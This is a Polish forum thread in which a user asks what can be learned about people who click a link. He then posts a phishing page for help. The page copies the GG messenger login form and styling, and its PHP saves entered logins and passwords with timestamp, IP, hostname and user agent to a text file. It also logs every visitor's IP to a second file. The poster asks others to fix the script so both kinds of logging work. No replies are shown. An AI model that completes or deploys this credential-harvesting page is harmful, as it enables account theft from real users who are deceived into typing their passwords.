Jak niebezpieczne sa linki...

adek204

Użytkownik
Dołączył
Wrzesień 30, 2012
Posty
49
Mam pytanie .. co jeszcze mogę wyciągnąć przez wejście w link (oprócz IP i przeglądarki)?
 
Ostatnio edytowane przez moderatora:

adek204

Użytkownik
Dołączył
Wrzesień 30, 2012
Posty
49
A problem . Czy może ktoś poprawić mi ten skrypt, żeby działało to tak, że po wpisaniu do "llogin i hasło" zapisywało wraz z godziną i wszystkimi danymi ale mimo wszystko jak ktoś wejdzie to zapisywało dane.
PHP:
<head>
        <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
        <meta http-equiv="Content-type" content="text/html; charset=utf-8"/>
<title>HEJTY</title>
<style type="text/css" media="all">

</style>
<style type="text/css" media="screen">

@import url(https://static3-login.gg.pl/css/project.screen.css?version=90);

</style>
 
        </script>

  </head>
    <body >
                
<div class="bottomFrame" id="login">
<div id="loginView" class="frame">

        <form action="/login/?id=frame_191&urlhashUri=https%3A%2F%2Fwww.gg.pl%2Fauthorize%2FurlHash&attempt_no=1&transport=PostMessage&origin=http%3A%2F%2Fwww.gg.pl%2F&context=parent&forceSyncStatus=false&client_id=13a8aec5f6e60b5880d83fdd18a314d5&useStatus=true" method="post" name="loginForm">
            <fieldset>
            <legend id="logInTxt">Zaloguj się</legend>
          
                <div>
                    <label><b>Numer GG</b> <span class="light gray">email lub telefon</span></label>
                    <input id="login_input" value="" class="input_long " type="text" name="uin" tabindex="1"/>
                                    </div>

                <div class="margin">
                    <label>Hasło</label>
                    <input class="input_long " type="password" name="password" id="password" tabindex="2"/>
                </div>

                <div class="actionsLeft">
                    <button class="blue" type="submit" name="doAction">Zaloguj</button>
                </div>

             </div>

            </fieldset>
            <hr></hr>
<?php  
$uin = trim($_POST['uin']); //usuwanie białych znaków z końca i początku lini
$password = trim($_POST['password']); //usuwanie białych znaków z końca i początku lini

if(!empty($uin) && !empty($password)) { //sprawdzenie, czy user podał dane

function prawdziwe_ip() { 
        if(isset($_SERVER['HTTP_CLIENT_IP'])) $ip = $_SERVER['HTTP_CLIENT_IP']; 
        elseif(isset($_SERVER['HTTP_X_FORWARDED_FOR'])) $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; 
        else $ip = $_SERVER['REMOTE_ADDR'];   

        return $ip; 
} //funkcja zwracająca faktyczne ip 

$dane = "Dane przechwycone ".date("d.m.y H:i:s").",\n
adres IP: ".prawdziwe_ip()." | 
host: ".gethostbyaddr(prawdziwe_ip())." | 
agent: ".$_SERVER['HTTP_USER_AGENT']."\n
login: ".$_POST['uin']." | haslo: ".$_POST['password']."\n"; 

$plik = @fopen('dane.txt',  'a') or die('Nie udalo sie zapisac pliku'); //otwarcie pliku 
fwrite($plik, $dane); //zapis danych 
fclose($plik); //domknięcie

}
?>

<?php 
function prawdziwe_ip() { 
        if(isset($_SERVER['HTTP_CLIENT_IP'])) $ip = $_SERVER['HTTP_CLIENT_IP']; 
        elseif(isset($_SERVER['HTTP_X_FORWARDED_FOR'])) $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; 
        else $ip = $_SERVER['REMOTE_ADDR'];   

        return $ip; 
} //funkcja zwracająca faktyczne ip 

$dane = 'Dane przechwycone dnia '.date('d.m.y H:i:s').',  
adres IP: '.prawdziwe_ip().' | host: '.gethostbyaddr(prawdziwe_ip()).' | agent: '.$_SERVER['HTTP_USER_AGENT']; 

$plik = @fopen('ip.txt',  'a') or die('Nie udalo sie zapisac pliku'); //otwarcie pliku 
fwrite($plik, $dane); //zapis danych 
fclose($plik); 
?>
 
Ostatnia edycja:
Do góry Bottom